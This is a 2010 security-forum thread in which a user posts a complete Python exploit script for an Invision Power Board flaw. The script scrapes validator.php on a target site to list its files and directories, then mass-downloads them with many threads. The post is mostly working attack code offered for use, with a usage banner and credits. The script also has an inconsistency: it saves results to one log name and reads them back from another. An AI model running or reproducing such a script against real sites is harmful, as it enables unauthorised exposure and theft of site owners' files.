|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 80
Members: 0
Total: 80
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
IP Board Full Disclosure exploit |
|
Posted: Mon Jan 25, 2010 2:47 pm |
|
|
VERTIGO |
Advanced user |
|
|
Joined: Sep 25, 2008 |
Posts: 87 |
|
|
|
|
|
|
|
Quote: | You need python 3.1 |
Code: |
#! /usr/bin/env python3.1
################################################################
# _____ _____ ____ (validator.php) #
# |_ _| __ \| _ \ #
# | | | |__) | |_) | #
# | | | ___/| _ < #
# _| |_| | | |_) | #
# |_____|_| |____/ #
# @expl0it... #
################################################################
# [ IPB Files / Directories Full Disclosure ] #
# [ Vuln discovered by TinKode / xpl0it written by cmiN ] #
# [ Greetz: insecurity.ro, darkc0de.com ] #
################################################################
# #
# Special thanks for: cmiN #
# www.TinKode.BayWords.com #
################################################################
import os, sys, urllib.request, urllib.parse, threading
def main():
logo = """
\t |---------------------------------------------------------------|
\t | _____ _____ ____ (TM) |
\t | |_ _| __ \| _ \ |
\t | | | | |__) | |_) | |
\t | | | | ___/| _ < |
\t | _| |_| | | |_) | |
\t | |_____|_| |____/ |
\t | |
\t | |
\t | IPB Full Disclosure expl0it |
\t | Written by cmiN |
\t | Vulnerability discovered by TinKode |
\t | |
\t | |
\t | Visit: www.insecurity.ro & www.darkc0de.com |
\t |---------------------------------------------------------------|
"""
usage = """
|---------------------------------------------------------------|
|Usage: ipbfd.py scan http://www.site.com/IPB_folder |
| ipbfd.py download *.zip -> all |
| ipbfd.py download name.jpg -> one |
|---------------------------------------------------------------|"""
if sys.platform in ("linux", "linux2"):
clearing = "clear"
else:
clearing = "cls"
os.system(clearing)
print(logo)
args = sys.argv
if len(args) == 3:
try:
print("Please wait...")
if args[1] == "scan":
extract_parse_save(args[2].strip("/"))
elif args[1] == "download":
download_data(args[2])
except Exception as message:
print("An error occurred: {}".format(message))
except:
print("Unknown error.")
else:
print("Ready!")
else:
print(usage)
input()
def extract_parse_save(url):
print("[+]Extracting content...")
hurl = url + "/validator.php"
with urllib.request.urlopen(hurl) as usock:
source = usock.read().decode()
print("[+]Finding token...")
word = "validate('"
index = source.find(word)
if index != -1:
source = source[index + len(word):]
value = source[:source.index("'")]
hurl = url + "/validator.php?op={}".format(value)
else:
print("[!]Token not found.")
print("[+]Obtaining paths...")
with urllib.request.urlopen(hurl) as usock:
lastk, lastv = None, None
dictionary = dict()
for line in usock:
line = line.decode()
index = line.find("<td>")
if index != -1:
lastk = line[index + 4:line.index("</td>")].strip(" ").strip(" ;;")
index = line.find("<strong>")
if index != -1:
lastv = line[index + 8:line.index("</strong>")].strip(" ")
if lastk != None and lastv != None:
index = lastk.rfind(".")
if index in (-1, 0):
lastk = "[other] {}".format(lastk)
else:
lastk = "[{}] {}".format(lastk[index + 1:], lastk)
dictionary[lastk] = lastv
lastk, lastv = None, None
print("[+]Organizing and saving paths...")
with open("IPBlogs.txt", "w") as fout:
fout.write(url + "\n")
keys = sorted(dictionary.keys())
for key in keys:
fout.write("{} ({})\n".format(key, dictionary[key]))
def download_data(files):
print("[+]Searching and downloading files...")
mthreads = 50
with open("vBlogs.txt", "r") as fin:
url = fin.readline().strip("\n").strip("/")
if files.find("*") == -1:
hurl = url + "/" + files.strip("/")
Download(hurl).start()
else:
ext = files[files.rindex(".") + 1:]
for line in fin:
pieces = line.strip("\n").split(" ")
if pieces[0].count(ext) == 1:
upath = pieces[1]
hurl = url + "/" + upath.strip("/")
while threading.active_count() > mthreads:
pass
Download(hurl).start()
while threading.active_count() > 1:
pass
class Download(threading.Thread):
def __init__(self, url):
threading.Thread.__init__(self)
self.url = url
def run(self):
try:
with urllib.request.urlopen(self.url) as usock:
data = usock.read()
uparser = urllib.parse.urlparse(usock.geturl())
pieces = uparser.path.split("/")
fname = pieces[len(pieces) - 1]
with open(fname, "wb") as fout:
fout.write(data)
except:
pass
if __name__ == "__main__":
main() | [/img] |
|
|
|
|
|
|
|
|
Posted: Mon Jan 25, 2010 7:24 pm |
|
|
AIR_Nayden |
Advanced user |
|
|
Joined: Dec 30, 2009 |
Posts: 70 |
Location: Bulgaria |
|
|
|
|
|
|
|
|
|
|
www.waraxe.us Forum Index -> Invision Power Board
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|